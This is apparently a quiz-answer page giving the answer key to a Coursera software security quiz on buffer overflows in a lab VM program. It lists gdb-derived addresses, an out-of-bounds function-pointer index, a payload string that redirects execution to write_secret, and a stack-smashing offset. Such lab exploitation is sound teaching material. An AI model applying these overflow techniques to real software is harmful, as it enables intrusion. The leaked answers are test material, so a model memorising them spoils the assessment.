Coursera Answers

Software Security Week 1 VM BOF Quiz Answer

Software Security Week 1 VM BOF Quiz Answer

Software Security Week 1 
VM BOF Quiz Answer


In this article i am gone to share Coursera Course Software Security Week 1 VM BOF Quiz Answer with you..


VM BOF Quiz


Question 1)

There is a stack-based overflow in the program.

What is the name of the stack-allocated variable that contains the overflowed buffer?

  • Answer: wis



Question 2)

Consider the buffer you just identified:

Running what line of code will overflow the buffer?

  • Answer: 62


Question 3)

There is another vulnerability, not dependent at all on the first, involving a non-stack allocated buffer that can be indexed outside its bounds. What variable contains this buffer?

  • Answer: ptrs


Question 4)

Consider the buffer you just identified: Running what line of code overflows the buffer?

  • Answer: 101



Question 5)

What is the address of buf?

  • Answer: 0xbfff f130


Question 6)

What is the address of ptrs?

  • Answer: 0x0804 a0d4


Question 7)

What is the address of write_secret?

  • Answer: 0x0804 8534


Question 8)

what is the address of p local to main?

  • Answer: 0xbfff f534


Question 9)

What input do you provide so that ptrs[s] reads/executes the contents of variable p instead of function in ptrs buffer? If ok, you will execute pat_on_back function. Enter your answer as an unsigned integer.


Answer:

(p-ptrs)/4 is

print /x (0xbffff534 – 0x804a0d4)/4

0x2dfed518 or 771675416


Question 10)

What do you enter so that ptrs[s] reads (and then tries to execute) starting from the 65th byte in buf, ie. the location at buf[64]?

Enter your answer as an unsiged integer.


Answer:

(gdb) print /x &buf[64]

$6 = 0xbffff170

(gdb) print /d  (int*)&buf[64]-(int *)&ptrs

$14 = 771675175

771675175



Question 11)

What do you replace xEExEExEExEE with to call write_secret?


Answer:

(gdb) print &write_secret

$7 = (void (*)(void)) 0x8048534 <write_secret>

771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx34x85x04x08



Question 12)

Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return address of that function, replacing it with the address of write_secret. How many bytes do you need to enter prior to the address of write_secret?

Answer:
148
eip at 0xbffff10c
(gdb) print &wis
$6 = (char (*)[128]) 0xbffff078
(gdb) print 0xbffff10c – 0xbffff078
$10 = 148